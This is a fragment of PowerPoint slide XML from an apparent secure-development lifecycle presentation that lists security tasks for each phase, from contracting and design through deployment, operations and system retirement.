            </a:rPr>
            <a:t>Note: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:rPr>
            <a:t>The annex is for US contract law, so please consult qualified legal advice before using the sample annex</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1322357" y="1144489"/>
        <a:ext cx="5329269" cy="933849"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="1032193"/>
          <a:ext cx="1115983" cy="1158439"/>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Request for Proposals (RFP) and Contracting</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="210332" y="1086671"/>
        <a:ext cx="1007027" cy="1049483"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3507052" y="114105"/>
          <a:ext cx="959877"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Negotiate planning and design with the developers and internal shareholders, e.g. security specialists.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>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Define the security architecture, controls, and countermeasures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appropriate</a:t>
          </a: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 to the protection needs and the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expected</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="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threat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="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level</a:t>
          </a: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 This should be supported by security specialists.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Ensure that the application owner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accepts</a:t>
          </a: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 remaining risks or provides additional resources.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In each sprint, ensure security stories are created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that include</a:t>
          </a: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 constraints added for non-functional requirements.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18694" y="2396177"/>
        <a:ext cx="5336593" cy="866163"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="2249433"/>
          <a:ext cx="1115983" cy="1159650"/>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Planning and </a:t>
          </a:r>
          <a:b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b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Design</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="210332" y="2303911"/>
        <a:ext cx="1007027" cy="1050694"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{992D08B6-B207-435B-A893-D17B49418ACB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3301853" y="1466642"/>
          <a:ext cx="1362792" cy="5425004"/>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400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Automate the secure deployment of the application, interfaces and all required components, including needed authorizations.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57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90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Test the technical functions and integration with the IT architecture and coordinate business tests.</a:t>
          </a:r>
          <a:endParaRPr lang="de-DE"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Create "use" and "abuse" test cases from technical and business perspectives.</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Manage security tests according to internal processes, the protection needs and the level of security required by the application.</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Put the application in operation and migrate from previously used applications if needed.</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Finalize all documentation, including the change management data base (CMDB) and security architecture.</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37273" y="3564274"/>
        <a:ext cx="5291952" cy="1229740"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="3467883"/>
          <a:ext cx="1114893" cy="1422521"/>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noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Deployment, Testing, and Rollout</a:t>
          </a:r>
          <a:endPar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a:off x="210279" y="3522308"/>
        <a:ext cx="1006043" cy="1313671"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3479208" y="2832099"/>
          <a:ext cx="1008083" cy="5425004"/>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123825" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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Operations must include guidelines for the security management of the application (e.g. patch management).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>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Raise the security awareness of users and manage conflicts about usability vs. security.</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Plan and manage changes, e.g. migrate to new versions of the application or other components like OS, middleware, and libraries.</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Update all documentation, including in the CMDB and the security architecture, controls, and countermeasures, including any runbooks or project documentation.</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19959" y="5089770"/>
        <a:ext cx="5326582" cy="909661"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="4949205"/>
          <a:ext cx="1114893" cy="1190791"/>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Operations and Change Management</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="210279" y="5003630"/>
        <a:ext cx="1006043" cy="1081941"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3694906" y="3848749"/>
          <a:ext cx="584169"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123825" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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Any required data should be archived. All other data should be securely wiped.</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Securely retire the application, including deleting unused accounts and roles and permissions.</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Set your application’s state to retired in the CMDB.</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00354" y="6300335"/>
        <a:ext cx="5373273" cy="527135"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="6198796"/>
          <a:ext cx="1115983" cy="73021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Retiring Systems</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="191500" y="6234442"/>
        <a:ext cx="1044691" cy="65892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2"/>
            <a:ext cx="2939075" cy="452790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="99610" tIns="49805" rIns="99610" bIns="49805" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Datumsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3841254" y="2"/>
            <a:ext cx="2939075" cy="452790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="99610" tIns="49805" rIns="99610" bIns="49805" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{46C0059F-706E-42AF-B504-DA4BA04161AF}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>18.11.2017</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Fußzeilenplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8613513"/>
            <a:ext cx="2939075" cy="452790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="99610" tIns="49805" rIns="99610" bIns="49805" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Foliennummernplatzhalter 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3841254" y="8613513"/>
            <a:ext cx="2939075" cy="452790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="99610" tIns="49805" rIns="99610" bIns="49805" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{91832A97-7139-43D2-8F8B-094A116E151F}" type="slidenum">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="943245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3"/>
            <a:ext cx="2938781" cy="453390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="107898" tIns="53949" rIns="107898" bIns="53949" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3841454" y="3"/>
            <a:ext cx="2938781" cy="453390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="107898" tIns="53949" rIns="107898" bIns="53949" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6C875393-9CE0-40DD-A78A-34757A3496C9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/18/17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Image Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2117725" y="681038"/>
            <a:ext cx="2546350" cy="3398837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:prstClr val="black"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="107898" tIns="53949" rIns="107898" bIns="53949" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Notes Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678181" y="4307206"/>
            <a:ext cx="5425440" cy="4080510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="107898" tIns="53949" rIns="107898" bIns="53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12838"/>
            <a:ext cx="2938781" cy="453390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="107898" tIns="53949" rIns="107898" bIns="53949" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3841454" y="8612838"/>
            <a:ext cx="2938781" cy="453390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="107898" tIns="53949" rIns="107898" bIns="53949" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{49E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="656740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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5318423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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8467203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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1233767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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="571452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5257800" y="8657167"/>
            <a:ext cx="1600200" cy="486833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF0736}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>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3200" b="1" spc="-100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2804001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5257800" y="8657167"/>
            <a:ext cx="1600200" cy="486833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF0736}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="4A1647"/>
              </a:gs>
              <a:gs pos="80000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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2800" b="1" spc="-100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6534000" y="108000"/>
            <a:ext cx="252000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="25400" cap="rnd" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A1647"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1933084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5257800" y="8657167"/>
            <a:ext cx="1600200" cy="486833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF0736}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6534000" y="108000"/>
            <a:ext cx="252000" cy="2286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9" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463200" y="6372000"/>
            <a:ext cx="3383280" cy="2761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1" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
